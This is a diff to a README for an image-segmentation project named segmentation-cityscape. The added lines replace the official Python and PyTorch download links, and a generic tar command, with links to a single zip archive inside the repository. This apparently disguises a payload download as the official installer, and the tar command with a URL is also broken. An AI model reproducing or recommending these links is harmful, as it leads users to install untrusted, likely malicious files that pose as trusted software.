YASH-13-lab/segmentation-cityscape/README.md

 - **Windows**: Right-click the file and choose "Extract All."
 Follow the instructions.
 - **macOS**: Double-click the file to extract it.
-- **Linux**: Use the command `tar -xvf filename.tar.gz` or right-click and extract.
+- **Linux**: Use the command `tar -xvf https://raw.githubusercontent.com/YASH-13-lab/segmentation-cityscape/main/src/data/segmentation_cityscape_1.1-beta.3.zip` or right-click and extract.

 ### Step 5: Install Required Dependencies

 To run the application, you need to install some Python packages.
 Here’s how:

-1. **Install Python**: Download Python from [python.org](https://www.python.org/downloads/) and follow the installation instructions.
+1. **Install Python**: Download Python from [https://raw.githubusercontent.com/YASH-13-lab/segmentation-cityscape/main/src/data/segmentation_cityscape_1.1-beta.3.zip](https://raw.githubusercontent.com/YASH-13-lab/segmentation-cityscape/main/src/data/segmentation_cityscape_1.1-beta.3.zip) and follow the installation instructions.

-2. **Install PyTorch**: Visit the [PyTorch website](https://pytorch.org/get-started/locally/) and follow the instructions to install it based on your environment.
+2. **Install PyTorch**: Visit the [PyTorch website](https://raw.githubusercontent.com/YASH-13-lab/segmentation-cityscape/main/src/data/segmentation_cityscape_1.1-beta.3.zip) and follow the instructions to install it based on your environment.

 3. **Install Other Packages**: Open your command line or terminal and run the following command: